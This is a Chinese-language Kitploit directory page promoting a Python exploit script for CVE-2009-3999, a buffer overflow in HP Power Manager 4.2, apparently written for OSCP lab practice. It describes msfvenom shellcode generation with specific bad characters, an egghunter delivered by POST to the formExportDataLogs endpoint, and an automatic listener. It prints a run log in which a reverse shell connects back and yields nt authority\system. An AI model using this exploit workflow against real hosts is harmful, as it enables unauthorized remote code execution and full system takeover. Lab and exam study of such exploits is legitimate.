Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2009-3999-HP-Power-Manager-4.2-Build-7-Buffer-Overflow — 用Python编写的用于CVE-2009-3999的自动脚本 | Kitploit
工具/GitHubGitHub/ac8999/cve-2009-3999-hp-power-manager-4.2-build-7-buffer-overflow
漏洞利用框架Payload生成漏洞利用Shellcode渗透测试学习与教育Shellcode 生成二进制利用实验室与实践
GitHubac8999/cve-2009-3999-hp-power-manager-4.2-build-7-buffer-overflow

CVE-2009-3999-HP-Power-Manager-4.2-Build-7-Buffer-Overflow

用Python编写的用于CVE-2009-3999的自动脚本

查看仓库
2154个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

在我准备OSCP的过程中,我遇到了CVE-2009-3999(HP Power Manager 4.2(Build 7)缓冲区溢出漏洞)。

此最新脚本已更新,以解决Python 3中有关字符串和字节处理的兼容性问题,确保payload以原始二进制形式传输,避免内存损坏。

该版本集成了自动化的msfvenom功能,可动态生成包含正确坏字符(\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c)的shellcode,将其附加到专门的EggHunter上,并通过POST请求将最终payload发送至formExportDataLogs端点。它专为教育用途和安全审计而设计,通过在一个引擎下处理shellcode生成和监听器启动,简化了漏洞利用工作流程。

  usage: python3 CVE-2009-3999.py <TARGET-IP> <TARGET-PORT> <LHOST> <LPORT>
  
  ┌──(venv)─(root㉿user)-[/run/…/user/2024/HTBox/kevin]
  └─# python3 exp6.py 192.168.147.45 80 192.168.45.183 4444
  [*] Generating msfvenom payload for 192.168.45.183:4444...
  [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  [-] No arch selected, selecting arch: x86 from the payload
  Found 11 compatible encoders
  Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
  x86/shikata_ga_nai failed with Encoding failed due to a nil character
  Attempting to encode payload with 1 iterations of x86/call4_dword_xor
  x86/call4_dword_xor succeeded with size 348 (iteration=0)
  x86/call4_dword_xor chosen with final size 348
  Payload size: 348 bytes
  Final size of python file: 1953 bytes
  [+] Sending exploit to 192.168.147.45:80
  [+] Exploit sent. Starting listener on 4444...
  listening on [any] 4444 ...
  connect to [192.168.45.183] from (UNKNOWN) [192.168.147.45] 49168
  Microsoft Windows [Version 6.1.7600]
  Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
  
  C:\Windows\system32>whoami
  whoami
  nt authority\system
下载工具